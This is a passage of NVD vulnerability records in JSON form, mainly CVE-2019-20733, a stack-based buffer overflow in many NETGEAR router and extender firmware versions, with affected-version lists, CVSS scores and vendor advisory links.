"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-23T21:15:11.877",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000059147/Security-Advisory-for-Pre-Authentication-Command-Injection-on-Some-Gateways-Routers-and-Extenders-PSV-2016-0074"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000059147/Security-Advisory-for-Pre-Authentication-Command-Injection-on-Some-Gateways-Routers-and-Extenders-PSV-2016-0074"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-78"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-16 20:15
Modified
2024-11-21 04:39
Severity ?
Summary
Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects D6220 before 1.0.0.44, D6400 before 1.0.0.78, D7000v2 before 1.0.0.51, D8500 before 1.0.3.42, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.110, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.24, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.26, R6300v2 before 1.0.4.28, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.28, R6900P before 1.3.1.64, R7000P before 1.3.1.64, R7100LG before 1.0.0.46, R7300DST before 1.0.0.68, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.122, R8500 before 1.0.2.122, WN2500RPv2 before 1.0.1.54, WNDR3400v3 before 1.0.1.22, and WNR3500Lv2 before 1.2.0.54.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "114EDC62-9DAE-45D9-8A90-A533BBBF50EB",
"versionEndExcluding": "1.0.0.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3EEA190-2E9C-4586-BF81-B115532FBA23",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7AD596B6-3D11-456F-8BD0-2E7153BA5F53",
"versionEndExcluding": "1.0.0.78",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "52FB0300-0FC9-4797-BACB-84D7D932A386",
"versionEndExcluding": "1.0.0.51",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "D8780623-F362-4FA5-8B33-37E9CB3FEE12",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "629E89E8-F329-4D11-9652-540752084DD3",
"versionEndExcluding": "1.0.3.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "91EFE482-AAF5-4B46-9658-94B1072F3CD2",
"versionEndExcluding": "1.0.0.110",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "099184A0-F1C6-4C3F-9C3B-F0B9AC0D4D14",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgnd2200b_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C6BA1429-E44F-4E29-8D5E-6EEAC17962E7",
"versionEndExcluding": "1.0.0.110",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgnd2200b:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "D6EBFFCE-0D9E-4383-8CD6-3DC4D2412446",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "54C9BF9A-F891-4337-AAFF-6E192A81B45B",
"versionEndExcluding": "1.0.0.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CDAA5899-B73C-4690-853E-B5400F034BE1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "74109B25-B64E-4166-A7B0-E3DA87B89161",
"versionEndExcluding": "1.0.0.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CC5488D9-651C-4BAB-A141-06B816690D42",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7147AB6A-80B2-4468-BF13-5B7554AA5DA3",
"versionEndExcluding": "1.0.0.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "02E7CA7E-E6CA-4BAB-8F40-4731EA523D91",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "094113E0-3656-4E2A-B9EF-D397296BD07C",
"versionEndExcluding": "1.0.2.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AB84CD03-765C-4D4F-A176-364F8E72A4E7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6120_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "12C1BB59-1A89-45B9-A1D2-6D8DFEEC2F16",
"versionEndExcluding": "1.0.0.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6120:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8C6DFDB6-1D7A-459A-8D30-FD4900ED718B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6130_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "09C02A78-A382-43A0-A20F-D6521F6DD57F",
"versionEndExcluding": "1.0.0.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6130:-:*:*:*:*:*:*:*",
"matchCriteriaId": "305E295C-9C73-4798-A0BE-7973E1EE5EAB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D74896A7-7EF2-41C9-8A29-59B2EA5ABA5C",
"versionEndExcluding": "1.0.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6150:v1:*:*:*:*:*:*:*",
"matchCriteriaId": "2CB9BD19-E748-41B9-8873-316FEB83F13D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A81A7574-A2C7-4216-98C6-6790FA705013",
"versionEndExcluding": "1.0.3.88",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3186CC67-B567-4A0C-BD2C-0433716FBD1B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2F1E93FB-4926-4AF5-BA5F-A4DE4314B45F",
"versionEndExcluding": "1.0.0.66",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F45B620-60B8-40F3-A055-181ADD71EFFF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5D1A9B6F-89B2-4785-A0E2-3FD322D6A28F",
"versionEndExcluding": "1.0.4.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "502055F1-F919-4C91-A3D0-B144027BC690",
"versionEndExcluding": "1.0.4.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EB86B739-440E-4269-92EC-F7F3058E4406",
"versionEndExcluding": "1.0.1.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4EAD37-164F-4631-8DED-AB9BD41D2429",
"versionEndExcluding": "1.0.2.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4E821B01-31C8-4766-BAAF-D814336617B9",
"versionEndExcluding": "1.0.1.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "08FF0010-66E3-485C-A22B-39E57E738550",
"versionEndExcluding": "1.0.1.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "577AD463-2E99-4D07-BF12-1D40AC88B3FC",
"versionEndExcluding": "1.0.9.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "103B19E9-C72D-43C2-8369-1C425E9B9AC7",
"versionEndExcluding": "1.3.1.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E23D8A41-75D8-4067-A961-3B81276527A8",
"versionEndExcluding": "1.3.1.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E59E66D2-7E73-45C8-8D3E-FE589CDBECA4",
"versionEndExcluding": "1.0.0.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "94B3A9D8-A276-41B2-B7BF-7DA58B879A9B",
"versionEndExcluding": "1.0.0.68",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E0C9AB4A-497B-4D5C-93E3-430C3361E24F",
"versionEndExcluding": "1.0.2.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "72C46066-B210-44BB-9219-14B2E8CCEF8E",
"versionEndExcluding": "1.0.4.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B19B770D-4660-4B12-8B5C-B689DA8CCB64",
"versionEndExcluding": "1.3.0.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3D6A70D-66AF-4064-9F1B-4358D4B1F016",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B2DDFF20-B761-4E45-9F16-CE15C82AAB5C",
"versionEndExcluding": "1.3.0.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F7EF872D-2537-4FEB-8799-499FC9D44339",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DB84CB9C-DA5C-4D18-9A54-375DD091D932",
"versionEndExcluding": "1.0.2.122",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4CA2B4B5-ED8D-476F-9F6E-630B43A38E27",
"versionEndExcluding": "1.0.2.122",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn2500rp_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0675F6C4-EB61-4DA3-8473-448E93D5E0A5",
"versionEndExcluding": "1.0.1.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn2500rp:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "1C4C1B98-9551-4862-AEAC-3D5C313BD275",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "46D1F73B-1AE0-40AE-BED7-CAE3C7EFEE3B",
"versionEndExcluding": "1.0.1.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr3500l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1E338A30-C349-41B4-B971-E6D6B0E9AFE4",
"versionEndExcluding": "1.2.0.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr3500l:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C8DE4BFA-41DE-4748-ACC7-14362333A059",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects D6220 before 1.0.0.44, D6400 before 1.0.0.78, D7000v2 before 1.0.0.51, D8500 before 1.0.3.42, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.110, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.24, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.26, R6300v2 before 1.0.4.28, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.28, R6900P before 1.3.1.64, R7000P before 1.3.1.64, R7100LG before 1.0.0.46, R7300DST before 1.0.0.68, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.122, R8500 before 1.0.2.122, WN2500RPv2 before 1.0.1.54, WNDR3400v3 before 1.0.1.22, and WNR3500Lv2 before 1.2.0.54."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por un desbordamiento del b\u00fafer en la regi\u00f3n stack de la memoria por parte de un atacante no autenticado. Esto afecta a D6220 versiones anteriores a 1.0.0.44, D6400 versiones anteriores a 1.0.0.78, D7000v2 versiones anteriores a 1.0.0.51, D8500 versiones anteriores a 1.0.3.42, DGN2200v4 versiones anteriores a 1.0.0.110, DGND2200Bv4 versiones anteriores a 1.0.0.110, EX3700 versiones anteriores a 1.0.0.70, EX3800 versiones anteriores a 1.0.0.70, EX6000 versiones anteriores a 1. 0,0,30, EX6100 versiones anteriores a 1.0.2.24, EX6120 versiones anteriores a 1.0.0.40, EX6130 versiones anteriores a 1.0.0.22, EX6150v1 versiones anteriores a 1.0.0.42, EX6200 versiones anteriores a 1.0.3.88, EX7000 versiones anteriores a 1.0.0.66, R6250 versiones anteriores a 1.0.4.26, R6300v2 versiones anteriores a 1.0.4.28, R6400 versiones anteriores a 1. 0.1.36, R6400v2 versiones anteriores a 1.0.2.52, R6700 versiones anteriores a 1.0.1.46, R6900 versiones anteriores a 1.0.1.46, R7000 versiones anteriores a 1.0.9.28, R6900P versiones anteriores a 1.3.1.64, R7000P versiones anteriores a 1.3.1.64, R7100LG versiones anteriores a 1.0.0.46, R7300DST versiones anteriores a 1.0.0.68, R7900 versiones anteriores a 1. 0.2.10, R8000 versiones anteriores a 1.0.4.12, R7900P versiones anteriores a 1.3.0.10, R8000P versiones anteriores a 1.3.0.10, R8300 versiones anteriores a 1.0.2.122, R8500 versiones anteriores a 1.0.2.122, WN2500RPv2 versiones anteriores a 1.0.1.54, WNDR3400v3 versiones anteriores a 1.0.1.22, y WNR3500Lv2 versiones anteriores a 1.2.0.54."
}
],
"id": "CVE-2019-20733",
"lastModified": "2024-11-21T04:39:12.980",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L",
"version": "3.0"
},
"exploitabilityScore": 0.8,
"impactScore": 4.7,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 0.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-16T20:15:13.490",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000061193/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2017"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000061193/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2017"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-787"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
